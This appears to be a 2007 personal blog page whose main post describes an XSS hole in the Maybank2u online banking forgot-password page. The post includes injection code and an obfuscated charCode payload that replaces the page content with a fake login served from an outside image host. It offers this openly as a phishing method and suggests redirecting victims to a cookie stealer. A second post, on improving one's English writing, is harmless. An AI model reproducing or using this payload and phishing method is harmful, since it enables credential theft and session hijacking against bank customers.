Ads by Google Convert Convert Video to DVD Convert PDF to JPEG 3G2 Convert OGM Avi Convert Mov

Blogeek
where geeks play

Home
Pr0ject
Tutorial
Comic
Fellowship
About

Subscribe
RSS Feed-Posts RSS Feed-Comments

September 2007
M T WT F S S
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
« Aug

Categories
Education (4)
Entertainment (2)
Firefox (1)
Games (2)
Jokes (5)
Lifelog (13)
Linux (1)
Security (5)
Whatever (1)
Windows (1)

Archives
September 2007
August 2007
July 2007
June 2007
May 2007
April 2007

Beloved Readers
You!
Join Our
Community
syahrul
 syahrul
niezam
Buy online
cheap
Cytotec

menteil

Encik
Marzuki

First L

Raja Munirah

frz703

free

View Reader Community

Join this Community
(provided by MyBlogLog)

« Older
Loading Newer »

Rob Maybank2u with javascript

Published September 5th, 2007 in Security. 0 Comments

I’m back. Now with another evil plan in mind.*grin*

I found a XSS hole in maybank2u online right in the https secured section. It seems
that Maybank2u use javascript to validate and filter user input in forgot password
page, before echoing it back. This can be easily evaded by sending the input not to
the textbox, but straight to the URL bar. As a result, user can inject javascript code
into the page by changing the birthday’s date value. Funny isn’t it?

XSS in maybak2u online POC

What can we do with a xssed site? It’s an online banking site dude, why not setting
up a phishing site right there?

First we need to remove the old content [forgot password form] using
getElementByTagName. Fire up your DOM Inspector in Firefox and you should find
that the form is in the 4th table. Replace the form HTML code with innerHTML
command. The whole code that we’re going to inject should be something like this.

oldcontent= document.getElementsByTagName(”table”)[3];
oldcontent.innerHTML=’<–phising code goes here–>’;

Convert the string to charCode

String.fromCharCode(60,115,99,114,105,112,116,62,109,121,80,61,32,100,111,99,117,109,

101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,

101,40,34,116,97,98,108,101,34,41,91,51,93,59,109,121,80,46,105,110,110,101,114,72,84,

77,76,61,39,60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,105,109,103,49,

55,48,46,105,109,97,103,101,115,104,97,99,107,46,117,115,47,105,109,103,49,55,48,47,

57,50,55,53,47,108,111,103,105,110,108,107,52,46,106,112,103,62,39,59,60,47,115,99,

114,105,112,116,62)
Yatta! A new phising site hosted by maybank2u itself with zero cent cost and it’s
https verified. [Tested only in Firefox]

Downside is, the URL is obviously long. Notice that the login form is just an image.
I’m lazy, and it can be better if you copy the HTML code from the real page. Keep
in mind that the longer your phishing code, the longer the URL will be.

If you don’t want to create a phishing site, you can just redirect the victim to a
cookie stealer. Set the cookie back to your browser and you’ll have 10 minutes
login time.

Maybank users, you don’t have to be worry since any money transaction need TAC
code. I told you earlier this is just a proof of concept. Haha.

This article is for educational purpose only. Whatever you do, you’re on your own.
To Mr.Fark: This is the better way to phish. Not the lame way that you did last time.

Download Video Converter We convert videos to DVDs

Convert MOV to AVI DVD MPEG WMV Conversion of most video formats
Convert All Popular Media File Type Conversion of pictures to DVDs
www.avs4you.com/AVS-Video-Converter www.dmoftexas.com

Teach me to write
Published August 18th, 2007 in Education. 0 Comments

Remember back in time when I decided to create my first blog, hoping I could
improve my English. Starting on that day, I had spent most of my free time reading
and publishing post until it has become one of my life routine.

The problem is, not all bloggers can write well and use the correct grammar,
including myself. I have to admit that. By reading that kind of writing, it will just
poison your mind and damage you English skills.

Sometimes I can’t keep myself from laughing when reading blog with poor
grammar. Did they just copy and paste the article to Google translator? I wonder if
my readers think the same way on me.

Now I’ll tell you my lame technique that I’ve been using for a long period of time.
Every time I write a new post, I’ll reread it for a few times, paste it in MS word and
scan for spelling errors. I’ll use Google to make sure that I’m using the accurate
words or phrases. My electronic dictionary and online Thesaurus are also come in
handy.

I know that some readers don’t even care about grammar errors as they only
interested with the content. For me, both are important because the way you write
shows the way you think. Plus, if you don’t know how to write well, you might
mislead the readers with the wrong ideas.

Care to share your writing technique?

Adobe University Software Video Transfers to DVD

Campus Productivity & Collaboration VHS, BETA, Camcorder, Film Reels 35mm
Solutions, Download the PDF Now! negatives, slides, slideshows
www.Adobe.com/Education www.memories2dvd.ca
 Search

Recent Posts
Rob Maybank2u with javascript
Teach me to write
Analogy of a transistor
Bored? Try this
Hi, my name is Pudge and I’m overweight

Recent Comments
flisterz on Bored? Try this
Hertz on Pownce pwned
tk2 on Bored? Try this
adq890 on Bored? Try this
xenowork on Hi, my name is Pudge and I'm overweight

AVI to DVD
Creator
Easily convert
your AVI files to
movie DVD. Free
to try!
smartDVDcreator.com

Convert VHS to
DVD Easily
Fast & Simple
DVDs of Home
Videos Easy to
Install Hardware &
Software
www.Roxio.com

VOB to AVI
Converter
Download free
software to
convert VOB
videos to AVI file
format.
video.nchsoftware.co…

DWG to PDF -
Free Trial
Batch, Combine,
Stamp, and more.
Includes PDF
editor to markup
PDFs.
www.bluebeam.com

Blogeek is powered by WP and K2

RSS Entries and RSS Comments